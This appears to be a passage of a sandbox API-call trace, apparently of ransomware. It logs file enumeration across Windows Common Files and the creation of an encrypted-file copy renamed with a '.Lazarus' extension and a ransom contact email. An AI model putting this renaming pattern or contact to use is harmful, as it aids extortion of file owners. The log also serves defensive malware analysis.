Flags=0x0, Size=0x82) returned 0x82718 [0104.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x82718, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 65 [0104.503] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0104.503] GetFileType (hFile=0x35c) returned 0x1 [0104.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82718 | out: hHeap=0x20000) returned 1 [0104.503] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0104.503] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0104.503] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0104.503] CloseHandle (hObject=0x35c) returned 1 [0104.504] AreFileApisANSI () returned 1 [0104.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x823b8 [0104.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x823b8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 65 [0104.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0104.504] GetFileType (hFile=0x35c) returned 0x1 [0104.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x823b8 | out: hHeap=0x20000) returned 1 [0104.504] CloseHandle (hObject=0x35c) returned 1 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0104.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0104.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0104.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0104.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0104.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0104.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0104.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0104.505] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x5898)) returned 1 [0104.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0104.505] GetFileType (hFile=0x35c) returned 0x1 [0104.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.506] GetFileType (hFile=0x368) returned 0x1 [0104.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\omnipos.exe", lpUsedDefaultChar=0x0) returned 42 [0104.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0104.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.585] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0104.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.585] AreFileApisANSI () returned 1 [0104.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0104.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67300 [0104.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x67300, cchWideChar=42 | out: lpWideCharStr="C:\\Program Files\\Common Files\\omnipos.exe") returned 42 [0104.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\omnipos.exe" (normalized: "c:\\program files\\common files\\omnipos.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0104.586] GetFileType (hFile=0x424) returned 0x1 [0104.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Services", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Services", lpUsedDefaultChar=0x0) returned 39 [0104.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0104.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0104.587] AreFileApisANSI () returned 1 [0104.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0104.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6ce48 [0104.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x6ce48, cchWideChar=39 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Services") returned 39 [0104.587] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services" (normalized: "c:\\program files\\common files\\services"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.587] GetLastError () returned 0x5 [0104.587] GetLastError () returned 0x5 [0104.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Services\\verisign.bmp", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Services\\verisign.bmp", lpUsedDefaultChar=0x0) returned 52 [0104.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0104.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0104.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0104.588] AreFileApisANSI () returned 1 [0104.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0104.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0104.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x467b8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 52 [0104.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.588] GetFileType (hFile=0x368) returned 0x1 [0104.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System", lpUsedDefaultChar=0x0) returned 37 [0104.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0104.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0104.589] AreFileApisANSI () returned 1 [0104.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0104.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d580 [0104.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x6d580, cchWideChar=37 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System") returned 37 [0104.589] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System" (normalized: "c:\\program files\\common files\\system"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.589] GetLastError () returned 0x5 [0104.589] GetLastError () returned 0x5 [0104.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado", lpUsedDefaultChar=0x0) returned 41 [0104.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0104.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0104.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0104.590] AreFileApisANSI () returned 1 [0104.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0104.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67240 [0104.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67240, cchWideChar=41 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado") returned 41 [0104.590] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado" (normalized: "c:\\program files\\common files\\system\\ado"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0104.590] GetLastError () returned 0x5 [0104.590] GetLastError () returned 0x5 [0104.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", lpUsedDefaultChar=0x0) returned 54 [0104.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0104.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0104.591] AreFileApisANSI () returned 1 [0104.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0104.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76020 [0104.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 54 [0104.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.592] GetFileType (hFile=0x368) returned 0x1 [0104.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc", lpUsedDefaultChar=0x0) returned 52 [0104.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0104.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0104.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0104.592] AreFileApisANSI () returned 1 [0104.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0104.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0104.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x469e8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 52 [0104.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.592] GetFileType (hFile=0x368) returned 0x1 [0104.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\en-US", lpUsedDefaultChar=0x0) returned 47 [0104.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui", lpUsedDefaultChar=0x0) returned 64 [0104.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll", lpUsedDefaultChar=0x0) returned 54 [0104.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll", lpUsedDefaultChar=0x0) returned 53 [0104.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb", lpUsedDefaultChar=0x0) returned 53 [0104.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb", lpUsedDefaultChar=0x0) returned 53 [0104.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb", lpUsedDefaultChar=0x0) returned 53 [0104.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado26.tlb", lpUsedDefaultChar=0x0) returned 53 [0104.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", lpUsedDefaultChar=0x0) returned 53 [0104.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", lpUsedDefaultChar=0x0) returned 53 [0104.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb", lpUsedDefaultChar=0x0) returned 53 [0104.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd.dll", lpUsedDefaultChar=0x0) returned 53 [0104.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb", lpUsedDefaultChar=0x0) returned 55 [0104.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msador15.dll", lpUsedDefaultChar=0x0) returned 54 [0104.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb", lpUsedDefaultChar=0x0) returned 54 [0104.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadox.dll", lpUsedDefaultChar=0x0) returned 52 [0104.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", lpUsedDefaultChar=0x0) returned 54 [0104.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msadrh15.dll", lpUsedDefaultChar=0x0) returned 54 [0104.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\DirectDB.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\DirectDB.dll", lpUsedDefaultChar=0x0) returned 50 [0104.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\en-US", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, 